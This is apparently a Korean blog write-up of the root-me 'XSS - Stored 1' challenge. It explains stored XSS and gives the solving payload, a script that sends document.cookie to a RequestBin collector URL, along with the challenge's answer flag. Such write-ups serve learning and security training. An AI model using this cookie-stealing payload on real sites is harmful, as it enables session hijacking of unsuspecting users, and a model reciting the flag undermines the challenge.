들어가 보시면 이렇게 문제가있습니다.
이름을 보시면 stored1이라는데 stored이란 악성 스크립트가 서버 내에 존재하는 데이터베이스 또는 파일 등의 형태로 저장되어 있다가 사용자가 저장된 악성 스크립트를 조회하는 순간 발생하는 형태의 xss입니다.
이 stored는 사용자의 입력 과정에서 부재로 html을 그대로 출력하게 됩니다 예를 들어 <script>alert("document.domain");</script>를 넣었다 하면 html에서는 이것을 그대로 명령어로 받아들입니다.
이제 시작하겠습니다.
풀이:
저는 일단
도메인은 없는거같습니다 쿠키를 보면
아무것도 일어나지 않았습니다. 저는 그래서
서버를 이용해야 한다는것을 알았고
RequestBin — Collect, inspect and debug HTTP requests and webhooks
requestbin.net
을 이용하여 풀어줬습니다 이 앱에 들어가면 임시의 서버를줍니다 그것으로 url을하고 자바스크립트로 코드를 짜주면 됩니다. 해보겠습니다
이렇게 해주면 서버에서는 아래보이는것처럼 뜨는것을 볼수 있을겁니다
<script>document.write("<img src=받은 주소?="+document.cookie+"'></img>");</script>
답은 NkI9qe4cdLIO2P7MIsWS8ofD6
'root-me-client' 카테고리의 다른 글
| root-me/CSRF - 0 protection문제풀이 (1) | 2022.07.24 |
|---|---|
| root-me web-client 9번 문제 풀이(Obfuscation 3) (0) | 2021.09.27 |
| root-me web-Client 8번 문제 풀이(Webpack) (1) | 2021.09.26 |
| root-me web-client 7번 문제 풀이(Native code) (2) | 2021.09.24 |
| root-me web-client 6번 문제 풀이(Obfuscation 2) (0) | 2021.09.23 |